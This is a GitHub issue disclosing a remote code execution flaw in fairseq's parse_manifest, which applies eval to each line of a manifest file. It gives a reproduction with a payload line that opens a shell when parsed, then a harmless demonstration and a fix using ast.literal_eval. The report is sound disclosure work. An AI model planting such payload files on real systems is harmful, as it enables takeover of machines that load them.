Dangerous implement of parsers (`fairseq.data.codedataset.parse_manifest`) can cause RCE while parsing a well-constructed evil file. #4869

Lyutoon · 2022-11-17T00:35:43Z

🐛 Bug

The dangerous function eval is used in fairseq.data.codedataset.parse_manifest. parse_manifest is commonly used to parse the manifest file when loading data (see the official example https://github.com/facebookresearch/fairseq/blob/b5a039c292facba9c73f59ff34621ec131d82341/examples/textless_nlp/pgslm/prepare_dataset.py). However, the incoming file is not validated in any way: eval is applied directly to every line that is read. If an attacker crafts a malicious file and feeds it to a server, or hands it to someone who loads it without inspecting it, the result is remote code execution (RCE).

Looking at the if-else code in the function:

def parse_manifest(manifest, dictionary):
    audio_files = []
    codes = []
    durations = []
    speakers = []

    with open(manifest) as info:
        for line in info.readlines():
            sample = eval(line.strip())
            if "cpc_km100" in sample:
                k = "cpc_km100"
            elif "hubert_km100" in sample:
                k = "hubert_km100"
            elif "phone" in sample:
                k = "phone"
            else:
                assert False, "unknown format"
            code = sample[k]
            code, duration = parse_code(code, dictionary, append_eos=True)

            codes.append(code)
            durations.append(duration)
            audio_files.append(sample["audio"])
            speakers.append(sample.get("speaker", None))

    return audio_files, codes, durations, speakers

We can see that the checks only test for string keys, so there is actually no need to use eval.

To Reproduce

Here is a minimal example.
First, construct a malicious file:

echo "__import__('os').system('/bin/sh')" > evil_file

Second, parse it:

from fairseq.data.codedataset import parse_manifest

parse_manifest('evil_file', None)
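
For anyone who wants to see the effect without spawning a shell, here is a minimal sketch that uses only the standard library, not fairseq. The payload string is a harmless stand-in chosen for illustration (it only reads the process ID), and the variable names are hypothetical. It shows that eval runs code embedded in a line, while ast.literal_eval refuses the same input.

```python
import ast
import os

# Benign stand-in for the malicious line: same shape as the payload above,
# but it only asks for the current process ID instead of starting a shell.
payload = "__import__('os').getpid()"

# eval executes the expression, so the import and the call really happen.
result = eval(payload)
ran_code = result == os.getpid()

# ast.literal_eval only accepts Python literals, so a function call is rejected.
try:
    ast.literal_eval(payload)
    rejected = False
except (ValueError, SyntaxError):
    rejected = True

print("eval executed the payload:", ran_code)
print("literal_eval rejected the payload:", rejected)
```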

Environment

fairseq Version: 0.12.2
OS: linux
How you installed fairseq: pip
Python version: 3.8.10

Additional context

This is easy to fix: just do not use eval. If the code only needs to work on str data, use str(). Otherwise, use ast.literal_eval().
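
A possible shape for the literal_eval variant is sketched below. It is not the fairseq implementation: parse_manifest_line and KNOWN_CODE_KEYS are hypothetical names introduced here, and the sketch assumes each manifest line is a Python dict literal, which the sample["audio"] and sample.get("speaker", None) accesses in the function suggest.

```python
import ast

# Keys checked by the if-else chain in parse_manifest, in the same order.
KNOWN_CODE_KEYS = ("cpc_km100", "hubert_km100", "phone")


def parse_manifest_line(line):
    """Hypothetical helper: parse one manifest line without eval.

    Returns the parsed sample dict and the name of the code key it contains.
    """
    # literal_eval accepts only literals (dicts, lists, strings, numbers, ...),
    # so expressions such as __import__('os').system(...) raise ValueError.
    sample = ast.literal_eval(line.strip())
    if not isinstance(sample, dict):
        raise ValueError("manifest line is not a dict literal")
    for key in KNOWN_CODE_KEYS:
        if key in sample:
            return sample, key
    raise ValueError("unknown format")
```

With this helper, a line such as {'audio': 'a.wav', 'hubert_km100': '1 2 3'} parses to a dict with key hubert_km100, while the line from evil_file raises ValueError instead of being executed.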

Lyutoon added bug needs triage labels Nov 17, 2022
